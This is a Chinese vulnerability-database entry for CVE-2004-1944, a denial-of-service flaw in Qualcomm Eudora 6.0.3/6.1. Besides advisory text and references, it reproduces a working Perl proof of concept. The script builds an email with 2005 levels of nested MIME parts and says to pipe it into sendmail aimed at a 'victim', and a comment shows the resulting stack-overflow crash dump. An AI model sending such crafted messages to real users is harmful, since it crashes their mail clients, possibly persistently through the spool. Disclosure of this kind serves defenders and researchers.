Qualcomm Eudora MIME消息嵌套服务拒绝漏洞

Qualcomm Eudora MIME消息嵌套服务拒绝漏洞

漏洞ID 1107875 漏洞类型 其他
发布时间 2004-04-14 更新时间 2005-10-20
图片[1]-Qualcomm Eudora MIME消息嵌套服务拒绝漏洞-安全小百科CVE编号 CVE-2004-1944
图片[2]-Qualcomm Eudora MIME消息嵌套服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200404-026
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24000
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-026
|漏洞详情
Windows中的Eudora6.1和6.0.3版本存在漏洞。远程攻击者通过深嵌套的多部分MIME信息导致服务拒绝(崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/10137/info

It has been reported that Eudora is prone to a denial of service vulnerability when handling e-mail containing excessive MIME nesting. The problem is known to occur when the application attempts to decode the deeply nested message.

Successful exploitation of this issue may allow an attacker to cause the application to crash due to corruption of stack memory. It is not known if this issue is further exploitable to execute arbitrary code.

It should be noted that this condition may be persistent since the offending message may remain in the client's mail spool.

Eudora 6.0.3 is reported to be vulnerable to this issue, however, other versions may be affected as well.

#!/usr/bin/perl --

print "From: men";
print "To: youn";
print "Subject: nested multipart testn";
print "Mime-Version: 1.0n";
print "X-Use: Pipe the output of this script into:  sendmail -i victimn";

&nest(0);
print "n";

sub nest {
  my ($x) = @_;
  my $b = sprintf("bndry%04d",$x);
  print "Content-Type: multipart/mixed; boundary="$b"nn";
  print "--$bn";
  print "Content-Type: text/plainnn";
  print "Level $xnn";

# No problem for 1995, but crash for 2005 deep nesting:
#
# (378.1c4): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000
# eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010202
# ntdll!LdrLoadAlternateResourceModule+9:
# 77f862ed 53               push    ebx

  if ($x < 2005) {
    print "--$bn";
    &nest($x+1);
  }
  print "--$bn";
  print "Content-Type: text/plainnn";
  print "Final $xn";
  print "--$b--nn";
}
|参考资料

来源:XF
名称:eudora-mime-message-dos(15857)
链接:http://xforce.iss.net/xforce/xfdb/15857
来源:BID
名称:10137
链接:http://www.securityfocus.com/bid/10137
来源:SECUNIA
名称:11360
链接:http://secunia.com/advisories/11360
来源:BUGTRAQ
名称:20040419Eudora6.1isevil
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108241694627321&w;=2
来源:FULLDISC
名称:20040414Eudora6.0.3nestedMIMEDoS
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020075.html

相关推荐: Linux IXJ Telephony Card Driver 2.4 Kernel Privilege Elevation Vulnerability

Linux IXJ Telephony Card Driver 2.4 Kernel Privilege Elevation Vulnerability 漏洞ID 1101409 漏洞类型 Unknown 发布时间 2002-10-17 更新时间 2002-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享